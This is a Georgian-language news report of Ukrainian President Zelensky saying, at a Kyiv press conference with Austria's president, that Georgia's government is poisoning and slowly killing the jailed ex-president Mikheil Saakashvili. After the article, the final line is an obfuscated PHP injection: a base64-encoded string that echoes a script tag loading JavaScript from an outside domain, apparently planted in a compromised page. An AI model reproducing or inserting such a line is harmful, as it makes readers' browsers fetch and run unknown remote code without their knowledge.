celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი თვლის, რომ საქართველოს ხელისუფლება საქართველოს ყოფილი პრეზიდენტის და უკრაინის ამჟამინდელი მოქალაქის მიხეილ სააკაშვილის მოკვლას აპირებს.
როგორც ზელენსკიმ კიევში ავსტრიის პრეზიდენტ ალექსანდრე ვან დერ ბელენთან გამართულ პრესკონფერენციაზე ჟურნალისტებს განუცხადა, შეხვედრამდე მას მიხეილ სააკაშვილის ამჟამინდელი მდგომარეობის ამსახველი ფოტოები გადასცეს.
"ოდესღაც ის საქართველოს პრეზიდენტი იყო. მიხეილ სააკაშვილი. ისინი (ფოტოები - IF-U) დავით არახამიამ მოგვაწოდა. მინდა ნახოთ, როგორ გამოიყურება.
მე მჯერა, რომ საქართველოს ხელისუფლება ახლა აკეთებს იმას, რასაც აკეთებს: კლავენ. თქვენ იცით, რომ მოწამლეს და ახლა ნელ-ნელა კლავენ“, - ხაზგასმით აღნიშნა ზელენსკიმ და მიხეილ სააკაშვილის დღევანდელი ფოტოები საჯაროდ აჩვენა. 
ზელენსკიმ დასვა შეკითხვა - „საქართველო, მისი ხელმძღვანელობა - ვისკენ არიან ისინი დღეს? ისინი ნეიტრალური არიან თუ რუსეთის მხარეს? იმიტომ, რომ რუსეთი ისე ექცევა თავის პოლიტიკოსებს, როგორც დღეს საქართველოს ხელმძღვანელობა ექცევა არა თავის პოლიტიკოსებს, არამედ უკრაინის მოქალაქეებს. და კიდევ ერთხელ: ნეიტრალური არიან ისინი? თუ ისინი მხოლოდ უკრაინის წინააღმდეგ არიან და ა.შ.? - განაცხადა პრეზიდენტმა ზელენსკიმ.
ამასთან, მან აღნიშნა, რომ უკრაინა დიდი პატივისცემით ეპყრობა ამა თუ იმ სახელმწიფოს ნეიტრალიტეტის საკითხს, მაგრამ არ ესმის საქართველოს დამოკიდებულება სააკაშვილის მიმართ.
„მინდა, პრესამ ნახოს, რა ხდება: უკრაინის მოქალაქის საჯარო წამება. მე არ განვიხილავ კითხვას, რატომ დააკავეს საქართველოს ყოფილი პრეზიდენტი, რა შედეგები მოჰყვება ამას საქართველოს პოლიტიკასა და დემოკრატიაზე. ეს მათი შიდა საკითხია. მე ვსაუბრობ უკრაინის მოქალაქის, მიხეილ სააკაშვილის დაკავებაზე, რომელსაც ყოველდღიურად საჯაროდ აწამებენ. და ვფიქრობ, მათი მიზანი მისი მოკვლაა“, - განაცხადა ზელენსკიმ.
 
 
327
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");